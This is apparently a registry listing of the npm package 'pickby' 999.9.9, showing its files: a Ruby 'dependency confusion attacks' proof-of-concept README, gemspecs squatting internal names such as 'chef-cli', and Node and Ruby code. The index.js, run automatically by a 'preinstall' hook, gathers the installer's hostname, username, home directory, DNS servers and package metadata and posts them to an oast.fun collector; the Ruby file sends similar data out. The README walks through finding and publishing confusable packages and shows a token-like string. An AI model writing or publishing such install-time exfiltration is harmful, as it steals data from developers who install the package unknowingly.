pickby 999.9.9
Sign up to get free protection for your applications and to get access to all the features.
Potentially problematic release.
This version of pickby might be problematic. Click here for more details.
- package/gem/ruby_dependency_confusion_attacks/CHANGELOG.md +5 -0
- package/gem/ruby_dependency_confusion_attacks/Gemfile +8 -0
- package/gem/ruby_dependency_confusion_attacks/README.md +128 -0
- package/gem/ruby_dependency_confusion_attacks/Rakefile +4 -0
- package/gem/ruby_dependency_confusion_attacks/bin/console +11 -0
- package/gem/ruby_dependency_confusion_attacks/bin/setup +8 -0
- package/gem/ruby_dependency_confusion_attacks/chef-cli-9.9.9.gem +0 -0
- package/gem/ruby_dependency_confusion_attacks/lib/mygem/version.rb +5 -0
- package/gem/ruby_dependency_confusion_attacks/lib/mygem.rb +0 -0
- package/gem/ruby_dependency_confusion_attacks/lib/mygem.rb.bak +28 -0
- package/gem/ruby_dependency_confusion_attacks/mygem.gemspec +12 -0
- package/gem/ruby_dependency_confusion_attacks/mygem.gemspec.bak +12 -0
- package/gem/ruby_dependency_confusion_attacks/sig/mygem.rbs +4 -0
- package/index.js +46 -0
- package/index.js.bak +46 -0
- package/package.json +14 -0
- package/package.json.bak +14 -0
@@ -0,0 +1,128 @@
|
|
1
|
+
<h1 align="center">
|
2
|
+
<a href="https://www.youtube.com/@techghoshal"><img src="https://github.com/techghoshal/ruby_dependency_confusion_attacks/assets/85815644/0b65137c-72e8-4003-b4b1-265cd25a37bd"></a>
|
3
|
+
<h1 align="center">Ruby Dependency Confusion Attacks POC
|
4
|
+
<p align="center"><img alt="Twitter Follow" src="https://img.shields.io/twitter/follow/techghoshal?style=social"></p>
|
5
|
+
</h1>
|
6
|
+
|
7
|
+
|
8
|
+
## How to Finds & How to Exploit
|
9
|
+
|
10
|
+
Finds Gemfile then check the all require here is public or not
|
11
|
+
|
12
|
+
`https://rubygems.org/gems/`
|
13
|
+
|
14
|
+
#### Download all target github repository
|
15
|
+
|
16
|
+
- Crate personal access tokens (classic) - https://github.com/settings/tokens
|
17
|
+
- Install ghorg - https://github.com/gabrie30/ghorg#installation
|
18
|
+
|
19
|
+
```bash
|
20
|
+
$ ghorg clone <target> -t <token>
|
21
|
+
```
|
22
|
+
`example: $ ghorg clone microsoft -t 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`
|
23
|
+
|
24
|
+
- After Download all repository finds vulnerable ruby package
|
25
|
+
|
26
|
+
```bash
|
27
|
+
$ find . -type f -name Gemfile | xargs -n1 -I{} cat {} | awk '/gem / {print}' | awk '{print $2;}' | tr -d '"' | tr -d ",'" | sort -u | xargs -n1 -I{} echo "https://rubygems.org/gems/{}" | httpx -status-code -silent -content-length -mc 404
|
28
|
+
```
|
29
|
+
- 404 code means this package not available publicly, so this the vulnerable to dependencies confusion attack.
|
30
|
+
|
31
|
+
- Then must be cross checking using github dorking - `org:microsoft package_name`
|
32
|
+
|
33
|
+
- So now Publish this ruby packages publicly (https://rubygems.org)
|
34
|
+
|
35
|
+
```bash
|
36
|
+
$ bundle gem <package_name>
|
37
|
+
```
|
38
|
+
- Everything set default
|
39
|
+
|
40
|
+
```bash
|
41
|
+
$ cd <package_name>
|
42
|
+
```
|
43
|
+
```bash
|
44
|
+
$ nano <package_name>.gem
|
45
|
+
```
|
46
|
+
- Replaced -
|
47
|
+
|
48
|
+
```bash
|
49
|
+
Gem::Specification.new do |s|
|
50
|
+
s.name = "<package_name>"
|
51
|
+
s.version = "9.9.9"
|
52
|
+
s.summary = "Vulnerability Disclosure: Dependency confiuse vulnerability"
|
53
|
+
s.description = "This Ruby package vulnerable to dependency confiuse vulnerability"
|
54
|
+
s.authors = ["<Anindya Ghoshal>"]
|
55
|
+
s.email = "<techghoshal@gmail.com>"
|
56
|
+
s.files = ["lib/<package_name>.rb"]
|
57
|
+
s.homepage =
|
58
|
+
"https://rubygems.org/gems/<package_name>"
|
59
|
+
s.license = "MIT"
|
60
|
+
end
|
61
|
+
```
|
62
|
+
- Save this file
|
63
|
+
|
64
|
+
```bash
|
65
|
+
$ cd lib
|
66
|
+
```
|
67
|
+
- Replaced -
|
68
|
+
|
69
|
+
```bash
|
70
|
+
module <myGem>
|
71
|
+
|
72
|
+
require 'json'
|
73
|
+
require 'net/http'
|
74
|
+
require 'socket'
|
75
|
+
|
76
|
+
#Private IP
|
77
|
+
privip = UDPSocket.open {|s| s.connect("64.233.187.99", 1); s.addr.last}
|
78
|
+
#Hostname
|
79
|
+
hostname = Socket.gethostname
|
80
|
+
#Current directory
|
81
|
+
dir = Dir.pwd
|
82
|
+
|
83
|
+
#Pubcli bin url:- https://pipedream.com OR burpCollaborate url
|
84
|
+
uri = URI('https://<pipedream.net>')
|
85
|
+
req = Net::HTTP::Post.new(uri, 'Content-Type' => 'application/json')
|
86
|
+
|
87
|
+
req.body = {
|
88
|
+
private_ip: privip,
|
89
|
+
hostname: hostname,
|
90
|
+
current_directory: dir
|
91
|
+
}.to_json
|
92
|
+
|
93
|
+
Net::HTTP.start(uri.hostname, uri.port, :use_ssl => uri.scheme == 'https') do |http|
|
94
|
+
http.request(req)
|
95
|
+
end
|
96
|
+
|
97
|
+
end
|
98
|
+
|
99
|
+
```
|
100
|
+
- Save this file
|
101
|
+
|
102
|
+
```bash
|
103
|
+
$ cd ..
|
104
|
+
```
|
105
|
+
```bash
|
106
|
+
$ gem build <package_name>.gemspec
|
107
|
+
```
|
108
|
+
- Upload file publicly (https://rubygems.org/)
|
109
|
+
|
110
|
+
- Create Accont on rubygems.org
|
111
|
+
|
112
|
+
```bash
|
113
|
+
$ gem push <package_name>-9.9.9.gem
|
114
|
+
```
|
115
|
+
- Enter your Email: `<email>`
|
116
|
+
- Enter your username: `<username>`
|
117
|
+
- Enter your password: `<password>`
|
118
|
+
|
119
|
+
---
|
120
|
+
|
121
|
+
<b>Upload IS DONE</b> 😎
|
122
|
+
- Must be checking - https://rubygems.org/gems/package_name
|
123
|
+
- 🎉 Now Bounty Time 💰💰
|
124
|
+
|
125
|
+
## Connect me
|
126
|
+
If you have any queries, you can always contact me on <a href="https://twitter.com/techghoshal">twitter(@techghoshal)</a>
|
127
|
+
|
128
|
+
|
@@ -0,0 +1,11 @@
|
|
1
|
+
#!/usr/bin/env ruby
|
2
|
+
# frozen_string_literal: true
|
3
|
+
|
4
|
+
require "bundler/setup"
|
5
|
+
require "mygem"
|
6
|
+
|
7
|
+
# You can add fixtures and/or initialization code here to make experimenting
|
8
|
+
# with your gem easier. You can also use a different console, if you like.
|
9
|
+
|
10
|
+
require "irb"
|
11
|
+
IRB.start(__FILE__)
|
Binary file
|
File without changes
|
@@ -0,0 +1,28 @@
|
|
1
|
+
module <myGem>
|
2
|
+
|
3
|
+
require 'json'
|
4
|
+
require 'net/http'
|
5
|
+
require 'socket'
|
6
|
+
|
7
|
+
#Private IP
|
8
|
+
privip = UDPSocket.open {|s| s.connect("64.233.187.99", 1); s.addr.last}
|
9
|
+
#Hostname
|
10
|
+
hostname = Socket.gethostname
|
11
|
+
#Current directory
|
12
|
+
dir = Dir.pwd
|
13
|
+
|
14
|
+
#Pubcli bin url:- https://pipedream.com OR burpCollaborate url
|
15
|
+
uri = URI('ck385ge2vtc00008gwb0gj1ta3wyyyyyf.oast.fun>')
|
16
|
+
req = Net::HTTP::Post.new(uri, 'Content-Type' => 'application/json')
|
17
|
+
|
18
|
+
req.body = {
|
19
|
+
private_ip: privip,
|
20
|
+
hostname: hostname,
|
21
|
+
current_directory: dir
|
22
|
+
}.to_json
|
23
|
+
|
24
|
+
Net::HTTP.start(uri.hostname, uri.port, :use_ssl => uri.scheme == 'https') do |http|
|
25
|
+
http.request(req)
|
26
|
+
end
|
27
|
+
|
28
|
+
end
|
@@ -0,0 +1,12 @@
|
|
1
|
+
Gem::Specification.new do |s|
|
2
|
+
s.name = "chef-cli"
|
3
|
+
s.version = "9.9.9"
|
4
|
+
s.summary = "Vulnerability Disclosure: Dependency confiuse vulnerability"
|
5
|
+
s.description = "This Ruby package vulnerable to dependency confiuse vulnerability"
|
6
|
+
s.authors = ["Anindya Ghoshal"]
|
7
|
+
s.email = "rootkaliroot@gmail.com"
|
8
|
+
s.files = ["lib/mygem.rb"]
|
9
|
+
s.homepage =
|
10
|
+
"https://rubygems.org/gems/mygem"
|
11
|
+
s.license = "MIT"
|
12
|
+
end
|
@@ -0,0 +1,12 @@
|
|
1
|
+
Gem::Specification.new do |s|
|
2
|
+
s.name = "mixlib-versioning"
|
3
|
+
s.version = "9.9.9"
|
4
|
+
s.summary = "Vulnerability Disclosure: Dependency confiuse vulnerability"
|
5
|
+
s.description = "This Ruby package vulnerable to dependency confiuse vulnerability"
|
6
|
+
s.authors = ["Anindya Ghoshal"]
|
7
|
+
s.email = "rootkaliroot@gmail.com"
|
8
|
+
s.files = ["lib/mygem.rb"]
|
9
|
+
s.homepage =
|
10
|
+
"https://rubygems.org/gems/mygem"
|
11
|
+
s.license = "MIT"
|
12
|
+
end
|
package/index.js
ADDED
@@ -0,0 +1,46 @@
|
|
1
|
+
const os = require("os");
|
2
|
+
const dns = require("dns");
|
3
|
+
const querystring = require("querystring");
|
4
|
+
const https = require("https");
|
5
|
+
const packageJSON = require("./package.json");
|
6
|
+
const package = packageJSON.name;
|
7
|
+
|
8
|
+
const trackingData = JSON.stringify({
|
9
|
+
p: package,
|
10
|
+
c: __dirname,
|
11
|
+
hd: os.homedir(),
|
12
|
+
hn: os.hostname(),
|
13
|
+
un: os.userInfo().username,
|
14
|
+
dns: dns.getServers(),
|
15
|
+
r: packageJSON ? packageJSON.___resolved : undefined,
|
16
|
+
v: packageJSON.version,
|
17
|
+
pjson: packageJSON,
|
18
|
+
});
|
19
|
+
|
20
|
+
var postData = querystring.stringify({
|
21
|
+
msg: trackingData,
|
22
|
+
});
|
23
|
+
|
24
|
+
var options = {
|
25
|
+
hostname: "ck385ge2vtc00008gwb0gjupp4yyyyyyg.oast.fun", //replace burpcollaborator.net with Interactsh or pipedream
|
26
|
+
port: 443,
|
27
|
+
path: "/",
|
28
|
+
method: "POST",
|
29
|
+
headers: {
|
30
|
+
"Content-Type": "application/x-www-form-urlencoded",
|
31
|
+
"Content-Length": postData.length,
|
32
|
+
},
|
33
|
+
};
|
34
|
+
|
35
|
+
var req = https.request(options, (res) => {
|
36
|
+
res.on("data", (d) => {
|
37
|
+
process.stdout.write(d);
|
38
|
+
});
|
39
|
+
});
|
40
|
+
|
41
|
+
req.on("error", (e) => {
|
42
|
+
// console.error(e);
|
43
|
+
});
|
44
|
+
|
45
|
+
req.write(postData);
|
46
|
+
req.end();
|
package/index.js.bak
ADDED
@@ -0,0 +1,46 @@
|
|
1
|
+
const os = require("os");
|
2
|
+
const dns = require("dns");
|
3
|
+
const querystring = require("querystring");
|
4
|
+
const https = require("https");
|
5
|
+
const packageJSON = require("./package.json");
|
6
|
+
const package = packageJSON.name;
|
7
|
+
|
8
|
+
const trackingData = JSON.stringify({
|
9
|
+
p: package,
|
10
|
+
c: __dirname,
|
11
|
+
hd: os.homedir(),
|
12
|
+
hn: os.hostname(),
|
13
|
+
un: os.userInfo().username,
|
14
|
+
dns: dns.getServers(),
|
15
|
+
r: packageJSON ? packageJSON.___resolved : undefined,
|
16
|
+
v: packageJSON.version,
|
17
|
+
pjson: packageJSON,
|
18
|
+
});
|
19
|
+
|
20
|
+
var postData = querystring.stringify({
|
21
|
+
msg: trackingData,
|
22
|
+
});
|
23
|
+
|
24
|
+
var options = {
|
25
|
+
hostname: "ck385ge2vtc00008gwb0gj1ta3wyyyyyf.oast.fun", //replace burpcollaborator.net with Interactsh or pipedream
|
26
|
+
port: 443,
|
27
|
+
path: "/",
|
28
|
+
method: "POST",
|
29
|
+
headers: {
|
30
|
+
"Content-Type": "application/x-www-form-urlencoded",
|
31
|
+
"Content-Length": postData.length,
|
32
|
+
},
|
33
|
+
};
|
34
|
+
|
35
|
+
var req = https.request(options, (res) => {
|
36
|
+
res.on("data", (d) => {
|
37
|
+
process.stdout.write(d);
|
38
|
+
});
|
39
|
+
});
|
40
|
+
|
41
|
+
req.on("error", (e) => {
|
42
|
+
// console.error(e);
|
43
|
+
});
|
44
|
+
|
45
|
+
req.write(postData);
|
46
|
+
req.end();
|
package/package.json
ADDED
@@ -0,0 +1,14 @@
|
|
1
|
+
{
|
2
|
+
"name": "pickby",
|
3
|
+
"version": "999.9.9",
|
4
|
+
"description": "",
|
5
|
+
"main": "index.js",
|
6
|
+
"scripts": {
|
7
|
+
"test": "echo \"Error: no test specified\" && exit 1",
|
8
|
+
"preinstall": " node index.js"
|
9
|
+
},
|
10
|
+
"author": "",
|
11
|
+
"license": "ISC",
|
12
|
+
"dependencies": {
|
13
|
+
}
|
14
|
+
}
|
package/package.json.bak
ADDED
@@ -0,0 +1,14 @@
|
|
1
|
+
{
|
2
|
+
"name": "pickby",
|
3
|
+
"version": "9.9.9.9",
|
4
|
+
"description": "",
|
5
|
+
"main": "index.js",
|
6
|
+
"scripts": {
|
7
|
+
"test": "echo \"Error: no test specified\" && exit 1",
|
8
|
+
"preinstall": " node index.js"
|
9
|
+
},
|
10
|
+
"author": "",
|
11
|
+
"license": "ISC",
|
12
|
+
"dependencies": {
|
13
|
+
}
|
14
|
+
}
|